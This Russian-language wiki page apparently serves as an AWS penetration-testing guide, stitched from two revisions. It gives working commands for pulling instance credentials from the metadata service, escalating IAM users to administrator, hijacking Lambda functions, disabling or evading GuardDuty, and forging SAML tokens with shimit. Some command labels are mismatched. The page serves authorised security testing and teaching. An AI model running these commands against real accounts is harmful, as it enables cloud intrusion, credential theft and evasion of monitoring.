docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png|1000px]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

Автоматизируйте проверку кода и оптимизируйте производительность приложений с помощью рекомендаций на базе машинного обучения

[[File:Aws codeguru.png| 1000px]]

https://aws.amazon.com/ru/codeguru/

Разделяется на следующие части:

- Reviewer - выявляет критические проблемы, уязвимости системы безопасности и трудноуловимые ошибки + дает рекомендации (языки Java и Python) - статикой.

- Profiler - выявление самых дорогостоящих строк, повышение производительности и тд засчет запуска в среде выполнения. Важно особенно для тех, кто платит за время работы скриптов.

Также на странице есть упоминание про их игру - BugBust

https://us-east-1.console.aws.amazon.com/codeguru/bugbust/participant#/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

Сервис по извлечению ценной информации из текста и работе с ним.

[[File:Aws comprehend.png|1000px]]

Список категорий, на которые может разбить текст, есть на фото выше.

Для пользовательских настроек есть несколько параметров:

- Кастомные классификации

- Кастомные определения вставок в тексте

- Endpoints - для real-time работы. !!! Достаточно дорогой сервис. В месяц берет 1400$ при минимальной сборке, поэтому если злоумышленник сможет запускать в нем Endpoint'ы в большом количестве, то компания обанкротится.

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

Собирает метрики из различных сервисов и детектит различные аномалии. Проще говоря, делает статистику по метрикам и с машинным обучением находит ошибки.

Источники метрик:

* CloudWatch

* AWS Config

* CloudTrail

* X-Ray

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-17T11:52:36Z

Drakylar: /* Comprehend */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

==== iam:PutRolePolicy ====

Создать или обновить inline-политику для роли.

==== iam:PutGroupPolicy ====

Создать или обновить inline-политику для группы.

==== iam:PuserUserPolicy ====

Создать или обновить inline-политику.

==== iam:UpdateAssumeRolePolicy + sts:AssumeRole ====

Обновить документ "AssumeRolePolicyDocument" для роли.

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

